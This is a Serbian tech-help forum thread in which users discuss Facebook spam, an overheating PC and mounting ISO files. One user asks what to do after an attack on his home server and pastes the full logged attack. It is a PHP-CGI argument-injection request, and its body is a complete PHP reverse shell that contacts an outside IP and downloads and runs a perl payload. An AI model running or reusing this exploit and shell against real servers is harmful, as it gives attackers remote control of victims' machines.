Pitanja

August 29, 2014

Obrisao, cekirao disk preko cmd-a kaze da je sve u redu nema bad sectora tako da sam odahnuo sto se toga tice. Ali moram posle da odradim reinstal.

August 29, 2014

Promena lozinke prvo. Onda odeš u podešavanja i pobrišeš sve alplikacije.

Pitanje, da li ima ikonicu fejsbuka na desktu, da li ima one razne tulbarove, facebook instant mesindžer ili nesto takvo?

Novi momenti.

Brisanje neke aplikacije je sprecilo prokletinju da spamuje taj neki link ali nastavlja da je ubacuje u grupe i posle brisanja svih aplikacija A activity logu samo bude was added to random group by neki lik. Koliko ja vidim samo prijatelji mogu da te dodaju u grupe a ovi likovi joj nisu prijatelji. Totalno sam zbunjen. Moguce da ih nekako sprijatelji pa anfrenduje posle dodavanja u grupe. Al opet hebeno kako?

Poslednjih 24h se nije ni logovala na fejs tako da to nije neophodan uslov da bi je ubacivali u grupe.

Sve neke kretenske grupe sa Novog Zelanda. Uglavnom vezane za kola.

Edited August 29, 2014 by katamaran

August 30, 2014

Youtube mi posle 15ak minuta gasi računar?!
Ima li neko ideju šta može biti u pitanju?
Pregrejavanje neko pretpostavljam?

edit: desktop je u pitanju

Edited August 30, 2014 by maheem

August 30, 2014

pregrejavanje, očisti vent na procu

August 31, 2014

napalo mi http server kod kuće sa ovim

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

što se dekodira u ovo

POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1

ovo su POST data, iz mog log-a:

2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] <?php
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] set_time_limit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $ip = '91.121.105.21';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $port = 22;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $chunk_size = 1400;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $write_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $error_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; wget 208.85.177.238/speedtest/.a/hb/php01 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $debug = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (function_exists('pcntl_fork')) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $pid = pcntl_fork();    
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if ($pid == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("ERROR: Can't fork");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if ($pid) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          exit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (posix_setsid() == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("Error: Can't setsid()");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $daemon = 1;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } else {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  printit("WARNING: Failed to daemonise.");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] chdir("/");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] umask(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $sock = fsockopen($ip, $port, $errno, $errstr, 30);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$sock) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  printit("$errstr ($errno)");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $descriptorspec = array(
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]    0 => array("pipe", "r"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]    1 => array("pipe", "w"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]    2 => array("pipe", "w")
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] );
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $process = proc_open($shell, $descriptorspec, $pipes);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!is_resource($process)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  printit("ERROR: Can't spawn shell");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[0], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[1], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[2], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($sock, 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] while (1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (feof($sock)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("ERROR: Shell connection terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (feof($pipes[1])) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("ERROR: Shell process terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $read_a = array($sock, $pipes[1], $pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (in_array($sock, $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("SOCK READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          $input = fread($sock, $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("SOCK: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          fwrite($pipes[0], $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (in_array($pipes[1], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDOUT READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          $input = fread($pipes[1], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDOUT: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (in_array($pipes[2], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDERR READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          $input = fread($pipes[2], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDERR: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($sock);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[0]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[1]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] proc_close($process);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] function printit ($string) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (!$daemon) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          print "$string
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ";
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ?>

kaj da radim sad, tj. šta da proveravam

August 31, 2014

mozda je samo bot, pogledaj sta ovi kazu, i related pitanja.

http://stackoverflow.com/questions/20576530/is-my-site-being-attacked-suhosin-simulation-very-strange-activity-in-ip-log

http://stackoverflow.com/questions/18008646/can-anyone-explain-this-php-code-injection-attack-to-me

Edited August 31, 2014 by djili

August 31, 2014

Nastavljam istragu sekinog druzenja sa novozelandjanima

Cela prica pocinje lajkovanjem nekog klipa na nekoj nasoj retardiranoj i nadasve seems legit stranici sa video klipovima. Ne bih da linkujem onu kretenariju od stranice... Tu je zet njenim nalogom lajkovao neki video da bi ga pogledao pa se navodno u pola posla setio da smo mu rekli da to ne radi pa je navodno odustao.

uglavnom njoj se tada pojavljuje likes a kretenski video on kretenskisajt.com i posle toga krece ubacivanje u NZ grupe i spamovanje

WATCH MOVIES FREE AND ENJOY nekisajtzastrimovanjefilmova.info

Utepavanjem aplikacija sprecio sam spamovanje ali u grupe i dalje upada. Jedino sada smanjenim intenzitetom od oko dve dnevno. Obrisao sam joj sve aplikacije i igre i cak iskljucio platformu sa aplikacijama ali nista ne pomaze

edit: kad sam guglao ono sto je spamovala pojavljuje se jos nasih ljudi koji to postuju tako da sam siguran da je ona stranica uzrok.

Edited August 31, 2014 by katamaran

August 31, 2014

skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb.

sta sad da radim?

August 31, 2014

skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb.

sta sad da radim?

Narežeš na CD.

August 31, 2014

pregrejavanje, očisti vent na procu

fala renne. učiniću to. danas radi ok al vreme mu je izgleda za penziju

August 31, 2014

Narežeš na CD.

Edit: A ako ti ne treba na cd-ovima možeš raspakovati na disku... Ne znam šta je...

August 31, 2014

Narežeš na CD.

so 19th century :)

instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima

August 31, 2014

so 19th century :)

instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima

:)

Možda mu treba tako.

August 31, 2014

kaj da radim sad

Ne mogu sad da čitam kôd s moba, ali svakako updateuj PHP i nemoj da držiš više interpreter u /cgi/bin/.

August 31, 2014

so 19th century :)

instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima

a cekaj, ubacim svih 5 ili je svaki zasebno?

Sign In

Pitanja

Recommended Posts

Moća

Link to comment

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Popular Posts

Hamlet Strašni

Filozof manijak

Anonymous

Posted Images

katamaran

Link to comment

maheem

Link to comment

renne

Link to comment

mei

Link to comment

djili

Link to comment

katamaran

Link to comment

ToniAdams

Link to comment

wall

Link to comment

maheem

Link to comment

wall

Link to comment

katamaran

Link to comment

wall

Link to comment

Töölönlahti

Link to comment

ToniAdams

Link to comment

Create an account or sign in to comment

Create an account

Sign in

Browse

Activity